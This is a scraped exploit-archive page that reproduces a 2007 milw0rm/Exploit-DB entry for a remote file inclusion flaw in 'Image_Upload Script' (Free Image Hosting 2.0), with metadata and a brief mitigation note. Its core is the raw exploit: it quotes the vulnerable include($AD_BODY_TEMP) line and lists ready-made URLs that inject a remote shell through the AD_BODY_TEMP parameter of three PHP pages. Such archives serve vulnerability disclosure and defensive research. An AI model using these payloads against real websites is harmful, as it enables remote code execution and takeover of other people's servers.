Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Image_Upload Script Remote File Inclusion Exploit - exploit.company
header-logo
Suggest Exploit
vendor:
Image_Upload Script
by:
Crackers_Child
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Image_Upload Script
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Image_Upload Script Remote File Inclusion Exploit

This exploit allows an attacker to include a malicious file from a remote server into the target website. By manipulating the 'AD_BODY_TEMP' parameter in various PHP files, the attacker can execute arbitrary code or perform unauthorized actions on the target system.

Mitigation:

To mitigate this vulnerability, the website owner should ensure that user-supplied input is properly validated and sanitized before being used in file inclusion operations. Additionally, the use of a Content Security Policy (CSP) can restrict the types of files that can be included.
Source

Exploit-DB raw data:

############################################################################################
Baslik  :Image_Upload Script  Remote File Inclusion Exploit
         Free Image Hosting 2.0

.ndir   : http://free-php-scripts.net/scripts/Image_Upload.zip

Bulan   :Crackers_Child

Zay.flk : <td><div align="center"><?php include($AD_BODY_TEMP);?></div></td>

Exploit : www.site.com/imageupload_path/login.php?AD_BODY_TEMP=Shell?

        : www.site.com/imageupload_path/frontpage.php?AD_BODY_TEMP=Shell?

        :www.site.com/imageupload_path/forgot_pass.php?AD_BODY_TEMP=Shell ?

Not     :[Olmek Var$a Kaderde Dert Ekleme Derdine ;) ]

Greetz  : EveryBody
############################################################################################ 

# milw0rm.com [2007-03-25]